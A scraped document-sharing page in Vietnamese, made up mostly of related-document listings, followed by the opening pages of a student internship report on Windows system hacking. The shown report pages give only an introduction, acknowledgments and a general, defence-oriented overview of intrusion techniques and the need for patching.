Báo cáo thực tập kế toán tổng hợp
Báo cáo thực tập kế toán tổng hợpBáo cáo thực tập kế toán tổng hợp
Báo cáo thực tập kế toán tổng hợp
Học kế toán thực tế
 
Bao cao thuc tap hoan chinh
Bao cao thuc tap hoan chinhBao cao thuc tap hoan chinh
Bao cao thuc tap hoan chinh
Nguyễn Thị Thảo
 
Báo cáo thực tập kế toán bán hàng và xác định kết quả kinh doanh
Báo cáo thực tập kế toán bán hàng và xác định kết quả kinh doanhBáo cáo thực tập kế toán bán hàng và xác định kết quả kinh doanh
Báo cáo thực tập kế toán bán hàng và xác định kết quả kinh doanh
Quang Phi Chu
 
Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016
Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016
Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016
tuan nguyen
 
Nhật ký thực tập hoàn chỉnh 1111
Nhật ký thực tập hoàn chỉnh 1111Nhật ký thực tập hoàn chỉnh 1111
Nhật ký thực tập hoàn chỉnh 1111
Lâm Xung
 
báo cáo thực tập kế toán bán hàng và xác định kết quả bán hàng
báo cáo thực tập kế toán bán hàng và xác định kết quả bán hàngbáo cáo thực tập kế toán bán hàng và xác định kết quả bán hàng
báo cáo thực tập kế toán bán hàng và xác định kết quả bán hàngNhân Bống
 
Báo cáo chuyên đề thực tập kế toán bán hàng và xác định kết quả kinh doanh
Báo cáo chuyên đề thực tập kế toán bán hàng và xác định kết quả kinh doanhBáo cáo chuyên đề thực tập kế toán bán hàng và xác định kết quả kinh doanh
Báo cáo chuyên đề thực tập kế toán bán hàng và xác định kết quả kinh doanhhuent042
 
Luận văn ke toan
Luận văn ke toanLuận văn ke toan
Luận văn ke toanLinh Bui
 
Báo cáo thực tập sản xuất kinh doanh
Báo cáo thực tập sản xuất kinh doanhBáo cáo thực tập sản xuất kinh doanh
Báo cáo thực tập sản xuất kinh doanh
Perfect Man
 
Hoàn thiện kế toán bán hàng và xác định kết quả bán hàng tại công ty cổ phần ...
Hoàn thiện kế toán bán hàng và xác định kết quả bán hàng tại công ty cổ phần ...Hoàn thiện kế toán bán hàng và xác định kết quả bán hàng tại công ty cổ phần ...
Hoàn thiện kế toán bán hàng và xác định kết quả bán hàng tại công ty cổ phần ...
https://www.facebook.com/garmentspace
 
Báo cáo thực tập tại công ty vận tải
Báo cáo thực tập tại công ty vận tảiBáo cáo thực tập tại công ty vận tải
Báo cáo thực tập tại công ty vận tải
Dương Hà
 
Báo cáo tổ chức công tác kế toán
Báo cáo tổ chức công tác kế toánBáo cáo tổ chức công tác kế toán
Báo cáo tổ chức công tác kế toán
Ketoantaichinh.net
 
Bê tông trộn sẵn: Quy trình sản xuất & kiểm tra kỹ thuật tại trạm trộn
Bê tông trộn sẵn: Quy trình sản xuất & kiểm tra kỹ thuật tại trạm trộnBê tông trộn sẵn: Quy trình sản xuất & kiểm tra kỹ thuật tại trạm trộn
Bê tông trộn sẵn: Quy trình sản xuất & kiểm tra kỹ thuật tại trạm trộn
Tập AP
 
Báo cáo thực tập hoàn thiện công tác Kế toán bán hàng và xác định kết quả kin...
Báo cáo thực tập hoàn thiện công tác Kế toán bán hàng và xác định kết quả kin...Báo cáo thực tập hoàn thiện công tác Kế toán bán hàng và xác định kết quả kin...
Báo cáo thực tập hoàn thiện công tác Kế toán bán hàng và xác định kết quả kin...
Lớp kế toán trưởng
 
kế toán bất động sản đầu tư
kế toán bất động sản đầu tư kế toán bất động sản đầu tư
kế toán bất động sản đầu tư
Thanh Hải
 
Báo cáo kế toán bán hàng và xác định kết quả kinh doanh
Báo cáo kế toán bán hàng và xác định kết quả kinh doanhBáo cáo kế toán bán hàng và xác định kết quả kinh doanh
Báo cáo kế toán bán hàng và xác định kết quả kinh doanh
Ác Quỷ Lộng Hành
 

Viewers also liked (20)

Báo cáo thực tập lần 1
Báo cáo thực tập lần 1Báo cáo thực tập lần 1
Báo cáo thực tập lần 1
 
Hướng dẫn báo cáo thực tập trường học viện tài chính
Hướng dẫn báo cáo thực tập trường học viện tài chínhHướng dẫn báo cáo thực tập trường học viện tài chính
Hướng dẫn báo cáo thực tập trường học viện tài chính
 
Báo cáo thực tập về công ty TNHH Thương Mại và Dịch Vụ Đức Thịnh
Báo cáo thực tập về công ty TNHH Thương Mại và Dịch Vụ Đức ThịnhBáo cáo thực tập về công ty TNHH Thương Mại và Dịch Vụ Đức Thịnh
Báo cáo thực tập về công ty TNHH Thương Mại và Dịch Vụ Đức Thịnh
 
Báo cáo thực tập tài chính doanh nghiệp
Báo cáo thực tập tài chính doanh nghiệpBáo cáo thực tập tài chính doanh nghiệp
Báo cáo thực tập tài chính doanh nghiệp
 
Báo cáo thực tập kế toán tổng hợp
Báo cáo thực tập kế toán tổng hợpBáo cáo thực tập kế toán tổng hợp
Báo cáo thực tập kế toán tổng hợp
 
Bao cao thuc tap hoan chinh
Bao cao thuc tap hoan chinhBao cao thuc tap hoan chinh
Bao cao thuc tap hoan chinh
 
Báo cáo thực tập kế toán bán hàng và xác định kết quả kinh doanh
Báo cáo thực tập kế toán bán hàng và xác định kết quả kinh doanhBáo cáo thực tập kế toán bán hàng và xác định kết quả kinh doanh
Báo cáo thực tập kế toán bán hàng và xác định kết quả kinh doanh
 
Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016
Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016
Báo cáo thực tập kế toán tổng hợp mới nhất năm 2016
 
Nhật ký thực tập hoàn chỉnh 1111
Nhật ký thực tập hoàn chỉnh 1111Nhật ký thực tập hoàn chỉnh 1111
Nhật ký thực tập hoàn chỉnh 1111
 
báo cáo thực tập kế toán bán hàng và xác định kết quả bán hàng
báo cáo thực tập kế toán bán hàng và xác định kết quả bán hàngbáo cáo thực tập kế toán bán hàng và xác định kết quả bán hàng
báo cáo thực tập kế toán bán hàng và xác định kết quả bán hàng
 
Báo cáo chuyên đề thực tập kế toán bán hàng và xác định kết quả kinh doanh
Báo cáo chuyên đề thực tập kế toán bán hàng và xác định kết quả kinh doanhBáo cáo chuyên đề thực tập kế toán bán hàng và xác định kết quả kinh doanh
Báo cáo chuyên đề thực tập kế toán bán hàng và xác định kết quả kinh doanh
 
Luận văn ke toan
Luận văn ke toanLuận văn ke toan
Luận văn ke toan
 
Báo cáo thực tập sản xuất kinh doanh
Báo cáo thực tập sản xuất kinh doanhBáo cáo thực tập sản xuất kinh doanh
Báo cáo thực tập sản xuất kinh doanh
 
Hoàn thiện kế toán bán hàng và xác định kết quả bán hàng tại công ty cổ phần ...
Hoàn thiện kế toán bán hàng và xác định kết quả bán hàng tại công ty cổ phần ...Hoàn thiện kế toán bán hàng và xác định kết quả bán hàng tại công ty cổ phần ...
Hoàn thiện kế toán bán hàng và xác định kết quả bán hàng tại công ty cổ phần ...
 
Báo cáo thực tập tại công ty vận tải
Báo cáo thực tập tại công ty vận tảiBáo cáo thực tập tại công ty vận tải
Báo cáo thực tập tại công ty vận tải
 
Báo cáo tổ chức công tác kế toán
Báo cáo tổ chức công tác kế toánBáo cáo tổ chức công tác kế toán
Báo cáo tổ chức công tác kế toán
 
Bê tông trộn sẵn: Quy trình sản xuất & kiểm tra kỹ thuật tại trạm trộn
Bê tông trộn sẵn: Quy trình sản xuất & kiểm tra kỹ thuật tại trạm trộnBê tông trộn sẵn: Quy trình sản xuất & kiểm tra kỹ thuật tại trạm trộn
Bê tông trộn sẵn: Quy trình sản xuất & kiểm tra kỹ thuật tại trạm trộn
 
Báo cáo thực tập hoàn thiện công tác Kế toán bán hàng và xác định kết quả kin...
Báo cáo thực tập hoàn thiện công tác Kế toán bán hàng và xác định kết quả kin...Báo cáo thực tập hoàn thiện công tác Kế toán bán hàng và xác định kết quả kin...
Báo cáo thực tập hoàn thiện công tác Kế toán bán hàng và xác định kết quả kin...
 
kế toán bất động sản đầu tư
kế toán bất động sản đầu tư kế toán bất động sản đầu tư
kế toán bất động sản đầu tư
 
Báo cáo kế toán bán hàng và xác định kết quả kinh doanh
Báo cáo kế toán bán hàng và xác định kết quả kinh doanhBáo cáo kế toán bán hàng và xác định kết quả kinh doanh
Báo cáo kế toán bán hàng và xác định kết quả kinh doanh
 

Similar to Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý

SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1
Con Ranh
 
CEHv9_Finish 01 - Ethical Hacking.pdf
CEHv9_Finish 01 - Ethical Hacking.pdfCEHv9_Finish 01 - Ethical Hacking.pdf
CEHv9_Finish 01 - Ethical Hacking.pdf
PeterTh3
 
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcBáo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Loc Tran
 
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
hanhha12
 
Báo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳBáo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳ
Long Prồ
 
Virus full
Virus fullVirus full
Virus full
Củ Chuối
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System Hacking
Huynh Khang
 
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdfAn Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
NuioKila
 
Thiet lap an toan mang isa cho mang doanh nghiep
Thiet lap an toan mang isa cho mang doanh nghiepThiet lap an toan mang isa cho mang doanh nghiep
Thiet lap an toan mang isa cho mang doanh nghiepFC Loveit
 
bctntlvn (24).pdf
bctntlvn (24).pdfbctntlvn (24).pdf
bctntlvn (24).pdfLuanvan84
 
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Thịt Xốt Cà Chua
 
Mạng máy tính nâng cao
Mạng máy tính nâng caoMạng máy tính nâng cao
Mạng máy tính nâng cao
ssuserd16c49
 
Rà soát Malware bằng SysInternal Suite
Rà soát Malware bằng SysInternal SuiteRà soát Malware bằng SysInternal Suite
Rà soát Malware bằng SysInternal Suite
Phạm Trung Đức
 
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chốngĐồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
nataliej4
 
pentest là gì
pentest là gì pentest là gì
pentest là gì
laonap166
 
tai lieu dao tao nhan thuc attt
tai lieu dao tao nhan thuc attttai lieu dao tao nhan thuc attt
tai lieu dao tao nhan thuc attt
Nguyen Xuan Quang
 
Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...
Security Bootcamp 2013   mo hinh ung dung hoi chan ma doc truc tuyen trong ti...Security Bootcamp 2013   mo hinh ung dung hoi chan ma doc truc tuyen trong ti...
Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...Security Bootcamp
 
Security Bootcamp 2013 - Mô hình ứng dụng hội chẩn mã độc trực tuyến trong ...
Security Bootcamp 2013  -  Mô hình ứng dụng hội chẩn mã độc trực tuyến trong ...Security Bootcamp 2013  -  Mô hình ứng dụng hội chẩn mã độc trực tuyến trong ...
Security Bootcamp 2013 - Mô hình ứng dụng hội chẩn mã độc trực tuyến trong ...Security Bootcamp
 
su-dung-metasploit-trong-danh-gia-an-toan-he-thong-thong-tin-1cb57d7b6e7b09e2...
su-dung-metasploit-trong-danh-gia-an-toan-he-thong-thong-tin-1cb57d7b6e7b09e2...su-dung-metasploit-trong-danh-gia-an-toan-he-thong-thong-tin-1cb57d7b6e7b09e2...
su-dung-metasploit-trong-danh-gia-an-toan-he-thong-thong-tin-1cb57d7b6e7b09e2...
ssuser8835db1
 
Bai 8
Bai 8Bai 8

Similar to Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý (20)

SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1
 
CEHv9_Finish 01 - Ethical Hacking.pdf
CEHv9_Finish 01 - Ethical Hacking.pdfCEHv9_Finish 01 - Ethical Hacking.pdf
CEHv9_Finish 01 - Ethical Hacking.pdf
 
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn LộcBáo cáo cuối kì system hacking-Trần Nguyễn Lộc
Báo cáo cuối kì system hacking-Trần Nguyễn Lộc
 
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
Dự Đoán Lỗ Hổng Phần Mềm Dựa Trên Kỹ Thuật Khai Phá Dữ Liệu _08300812092019
 
Báo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳBáo cáo thực tập cuối kỳ
Báo cáo thực tập cuối kỳ
 
Virus full
Virus fullVirus full
Virus full
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System Hacking
 
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdfAn Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
An Ninh Mạng Và Kỹ Thuật Session Hijacking.pdf
 
Thiet lap an toan mang isa cho mang doanh nghiep
Thiet lap an toan mang isa cho mang doanh nghiepThiet lap an toan mang isa cho mang doanh nghiep
Thiet lap an toan mang isa cho mang doanh nghiep
 
bctntlvn (24).pdf
bctntlvn (24).pdfbctntlvn (24).pdf
bctntlvn (24).pdf
 
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
Nghiên cứu một số hình thức tấn công website phổ biến và các giải pháp phòng ...
 
Mạng máy tính nâng cao
Mạng máy tính nâng caoMạng máy tính nâng cao
Mạng máy tính nâng cao
 
Rà soát Malware bằng SysInternal Suite
Rà soát Malware bằng SysInternal SuiteRà soát Malware bằng SysInternal Suite
Rà soát Malware bằng SysInternal Suite
 
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chốngĐồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
Đồ án thực tập cơ sở các kĩ thuật tấn công SQL injection và cách phòng chống
 
pentest là gì
pentest là gì pentest là gì
pentest là gì
 
tai lieu dao tao nhan thuc attt
tai lieu dao tao nhan thuc attttai lieu dao tao nhan thuc attt
tai lieu dao tao nhan thuc attt
 
Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...
Security Bootcamp 2013   mo hinh ung dung hoi chan ma doc truc tuyen trong ti...Security Bootcamp 2013   mo hinh ung dung hoi chan ma doc truc tuyen trong ti...
Security Bootcamp 2013 mo hinh ung dung hoi chan ma doc truc tuyen trong ti...
 
Security Bootcamp 2013 - Mô hình ứng dụng hội chẩn mã độc trực tuyến trong ...
Security Bootcamp 2013  -  Mô hình ứng dụng hội chẩn mã độc trực tuyến trong ...Security Bootcamp 2013  -  Mô hình ứng dụng hội chẩn mã độc trực tuyến trong ...
Security Bootcamp 2013 - Mô hình ứng dụng hội chẩn mã độc trực tuyến trong ...
 
su-dung-metasploit-trong-danh-gia-an-toan-he-thong-thong-tin-1cb57d7b6e7b09e2...
su-dung-metasploit-trong-danh-gia-an-toan-he-thong-thong-tin-1cb57d7b6e7b09e2...su-dung-metasploit-trong-danh-gia-an-toan-he-thong-thong-tin-1cb57d7b6e7b09e2...
su-dung-metasploit-trong-danh-gia-an-toan-he-thong-thong-tin-1cb57d7b6e7b09e2...
 
Bai 8
Bai 8Bai 8
Bai 8
 

Recently uploaded

BAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdf
BAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdfBAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdf
BAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdf
phamthuhoai20102005
 
Ảnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nay
Ảnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nayẢnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nay
Ảnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nay
chinhkt50
 
AV6 - PIE CHART WRITING skill in english
AV6 - PIE CHART WRITING skill in englishAV6 - PIE CHART WRITING skill in english
AV6 - PIE CHART WRITING skill in english
Qucbo964093
 
98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...
98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...
98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...
Nguyen Thanh Tu Collection
 
Chương III (Nội dung vẽ sơ đồ tư duy chương 3)
Chương III (Nội dung vẽ sơ đồ tư duy chương 3)Chương III (Nội dung vẽ sơ đồ tư duy chương 3)
Chương III (Nội dung vẽ sơ đồ tư duy chương 3)
duykhoacao
 
Dẫn luận ngôn ngữ - Tu vung ngu nghia.pptx
Dẫn luận ngôn ngữ - Tu vung ngu nghia.pptxDẫn luận ngôn ngữ - Tu vung ngu nghia.pptx
Dẫn luận ngôn ngữ - Tu vung ngu nghia.pptx
nvlinhchi1612
 
30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf
30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf
30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf
ngocnguyensp1
 
Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...
Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...
Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...
https://www.facebook.com/garmentspace
 
GIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdf
GIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdfGIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdf
GIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdf
Điện Lạnh Bách Khoa Hà Nội
 
CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...
CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...
CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...
Nguyen Thanh Tu Collection
 

Recently uploaded (10)

BAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdf
BAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdfBAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdf
BAI TAP ON HE LOP 2 LEN 3 MON TIENG VIET.pdf
 
Ảnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nay
Ảnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nayẢnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nay
Ảnh hưởng của nhân sinh quan Phật giáo đến đời sống tinh thần Việt Nam hiện nay
 
AV6 - PIE CHART WRITING skill in english
AV6 - PIE CHART WRITING skill in englishAV6 - PIE CHART WRITING skill in english
AV6 - PIE CHART WRITING skill in english
 
98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...
98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...
98 BÀI LUYỆN NGHE TUYỂN SINH VÀO LỚP 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ ...
 
Chương III (Nội dung vẽ sơ đồ tư duy chương 3)
Chương III (Nội dung vẽ sơ đồ tư duy chương 3)Chương III (Nội dung vẽ sơ đồ tư duy chương 3)
Chương III (Nội dung vẽ sơ đồ tư duy chương 3)
 
Dẫn luận ngôn ngữ - Tu vung ngu nghia.pptx
Dẫn luận ngôn ngữ - Tu vung ngu nghia.pptxDẫn luận ngôn ngữ - Tu vung ngu nghia.pptx
Dẫn luận ngôn ngữ - Tu vung ngu nghia.pptx
 
30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf
30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf
30 - ĐỀ THI HSG - HÓA HỌC 9 - NĂM HỌC 2021 - 2022.pdf
 
Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...
Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...
Khoá luận tốt nghiệp ngành Truyền thông đa phương tiện Xây dựng kế hoạch truy...
 
GIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdf
GIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdfGIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdf
GIÁO TRÌNH 2-TÀI LIỆU SỬA CHỮA BOARD MONO TỦ LẠNH MÁY GIẶT ĐIỀU HÒA.pdf
 
CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...
CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...
CHUYÊN ĐỀ BỒI DƯỠNG HỌC SINH GIỎI KHOA HỌC TỰ NHIÊN 9 CHƯƠNG TRÌNH MỚI - PHẦN...
 

Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý

  • 1. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 1 MỞ ĐẦU Theo thống kê của công ty Bkav, từ đầu năm 2013 đến nay, tại Việt Nam đã có 2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có khoảng 300 website bị tấn công. Ông Vũ Ngọc Sơn, Phó chủ tịch phụ trách Nghiên cứu phát triển củaBkav cho biết, các cơ quan doanh nghiệp bị tấn công gần như là đầy đủ, từ ít nghiêm trọng đến nghiêm trọng và rất nghiêm trọng (nhằm đánh cắp các tài liệu mật) và các mã độc này nhắm cả vào Bộ Công An, Bộ Quốc phòng, ngân hàng, các cơ quan đơn vị nghiên cứu, các doanh nghiệp… Theo nhìn nhận của Bkav, đã có những chiến dịch tấn công, phát tán mã độc có chủ đích vào Việt Nam. Trong đó, bản thân các vụ tấn công trên mạng và các vụ xâm nhập hệ thống công nghệ thông tin là nhằm do thám, trục lợi, phá hoại dữ liệu, ăn cắp tài sản, cạnh tranh không lành mạnh và một số vụ mất an toàn thông tin số khác đang gia tăng ở mức báo động về số lượng, đa dạng về hình thức, tinh vi hơn về công nghệ. Trước tình hình đó, song songviệc ban hành chỉthị897/CT-TTg,Thủ Tướng chỉđạo các Bộ, ngành, địa phương tăng cường giải pháp đảm bảo an toàn thông tin số. Thủ tướng Chính phủ cũng đã nêu rõ, trong thời gian qua, tình hình mất an toàn thông tin số ở nước ta diễn biến phức tạp, xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến việc ứng dụng công nghệ thông tin phục vụ phát triển kinh tế - xã hội và đảm bảo quốc phòng, an ninh. Bài báo cáo này sẽ giới thiệu tổng quát về các phương pháp mà Hacker sử dụngđểtấncôngxâmnhậpvàkhaithácvàocácphiểnbảnhệđiềuhành Windows, hệ điều hành phổ biến nhất hiện nay tại Việt Nam, từ đó giúp chúng ta nắm rõ cách thức mà Hacker sử dụng và đưa ra các giải pháp giúp cho mỗi người dùng được an toàn thông tin, bảo mật trong thời đại Internet ngày nay. Hoàng Thanh Quý.
  • 2. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 2 LỜI CẢM ƠN Để thực hiện và hoàn thànhđề tài này,trước hết tôi xin cảm ơn đến các thầy Võ Đỗ Thắng, giảng viên hướng dẫn sinh viên thực tập tại Trung tâm đào tạo quản trị mạngvà an ninh mạngquốc tế ATHENA, đã tận tình chỉ bảo trong thời gian vừa qua. Tôicũngxin gửi lờicám ơn đếncác anh chị, bạn bè đã truyền đạt kinh nghiệm và tạo điều kiện cho tôi hoàn thành đề tài này. Trong quá trình thực hiệnđề tàikhông thểkhông có nhữngsai sót, mong thầycô tại trung tâm ATHENA và các bạn thẳng thắn góp ý đề tôi rútkinh nghiệm trong các công trình tìm hiểu, phát triển sau này. Hoàng Thanh Quý.
  • 3. ĐỀ TÀI: TẤN CÔNG HỆ THỐNG – SYSTEM HACKING SVTH: HOÀNG THANH QUÝ Trang 3 PHẦN 1: GIỚI THIỆU 1.1 System Hacking và Tình hình an ninh mạng Việt Nam System hacking bao gồm những kỹ thuật lấy username, password dựa vào phần mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ điều hành Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những log file hệ thống. Một khi đã xâm nhập vào hệ thống, Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ chức. 1.2 Các lỗ hổng thường khai thác trong hệ điều hành Windows Phần mềm máy tính ngày nay vô cùng phức tạp, bao gồm hàng ngàn dòng mã. Phần mềm được viết ra bởi con người, nên cũng chẳng có gì lạ khi trong đó có chứa những lỗi lập trình, được biết đến với tên gọi lỗ hổng. Những lỗ hổng này được Hacker sử dụng để xâm nhập vào hệ thống, cũng như được tác giả của các đọan mã độc dùng để khởi động chương trình của họ một cách tự động trên máy tính của bạn. Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điều hành, các Web Server hay các phần mềm khác, ... Và các hãng sản xuất luôn cập nhật các lỗ hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các phiên bản trước. Do đó, người sử dụng phải luôn cập nhật thông tin và nâng cấp phiên bản cũ mà mình đang sử dụng nếu không các Hacker sẽ lợi dụng điều này để 